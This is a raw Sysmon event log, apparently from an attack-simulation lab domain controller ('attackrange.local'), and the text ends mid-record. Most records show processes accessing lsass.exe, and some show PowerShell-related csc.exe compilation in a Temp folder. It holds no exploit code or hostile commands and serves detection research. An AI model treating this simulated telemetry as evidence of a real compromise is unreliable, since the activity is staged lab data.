13:54:11.642{10ACEC4A-853E-5FCF-0B00-000000009101}864100C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003661Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:11.642{10ACEC4A-853E-5FCF-0B00-000000009101}864100C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003660Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:11.642{10ACEC4A-853E-5FCF-0B00-000000009101}864100C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003659Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:11.564{10ACEC4A-853E-5FCF-0B00-000000009101}864908C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003658Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:11.564{10ACEC4A-853E-5FCF-0B00-000000009101}864908C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003657Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:11.564{10ACEC4A-853E-5FCF-0B00-000000009101}864908C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003656Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:11.549{10ACEC4A-853E-5FCF-0B00-000000009101}864908C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003655Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:11.549{10ACEC4A-853E-5FCF-0B00-000000009101}864908C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003654Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:11.549{10ACEC4A-853E-5FCF-0B00-000000009101}864908C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000003653Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.localDLL2020-12-08 13:54:11.003{10ACEC4A-8582-5FCF-B300-000000009101}4508C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeC:\Users\Administrator\AppData\Local\Temp\hz4jjg4n\hz4jjg4n.dll2020-12-08 13:54:10.878 10341000x80000000000000003652Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:11.003{10ACEC4A-8580-5FCF-AB00-000000009101}45284412C:\Windows\system32\conhost.exe{10ACEC4A-8583-5FCF-B400-000000009101}4404C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003651Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:10.987{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003650Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:10.987{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003649Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:10.987{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003648Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:10.987{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003647Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:10.987{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003646Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:10.987{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003645Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:10.987{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003644Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:10.987{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003643Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:10.987{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003642Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:10.987{10ACEC4A-853E-5FCF-0500-000000009101}644792C:\Windows\system32\csrss.exe{10ACEC4A-8583-5FCF-B400-000000009101}4404C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003641Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:10.987{10ACEC4A-8582-5FCF-B300-000000009101}45084536C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe{10ACEC4A-8583-5FCF-B400-000000009101}4404C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+b181|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3d58|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3ed0|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3fa6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+274e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+27a0|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+28e4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+7e38f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+45d22|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+448ef|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+445e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+44303|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+18321|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+17b76|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+9e0d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+1edf02|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003640Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:11.001{10ACEC4A-8583-5FCF-B400-000000009101}4404C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe12.00.52519.0 built by: VSWINSERVICINGMicrosoft® Resource File To COFF Object Conversion UtilityMicrosoft® .NET FrameworkMicrosoft CorporationCVTRES.EXEC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\ADMINI~1\AppData\Local\Temp\RES2025.tmp" "c:\Users\Administrator\AppData\Local\Temp\hz4jjg4n\CSCA0AE92F135AD432E87D26C25AD37EFC.TMP"C:\Users\Administrator\ATTACKRANGE\Administrator{10ACEC4A-8580-5FCF-A596-060000000000}0x696a50HighMD5=33BB8BE0B4F547324D93D5D2725CAC3D,SHA256=54315FD2B69C678EB7D8C145F683C15F41FA9F7B9ABF7BF978667DF4158F43C3,IMPHASH=9A65E39CA38ADDAA7D4BB704AD0223FF{10ACEC4A-8582-5FCF-B300-000000009101}4508C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Administrator\AppData\Local\Temp\hz4jjg4n\hz4jjg4n.cmdline" 10341000x80000000000000003798Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:12.813{10ACEC4A-853E-5FCF-0B00-000000009101}864908C:\Windows\system32\lsass.exe{10ACEC4A-8584-5FCF-BD00-000000009101}1928C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003797Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 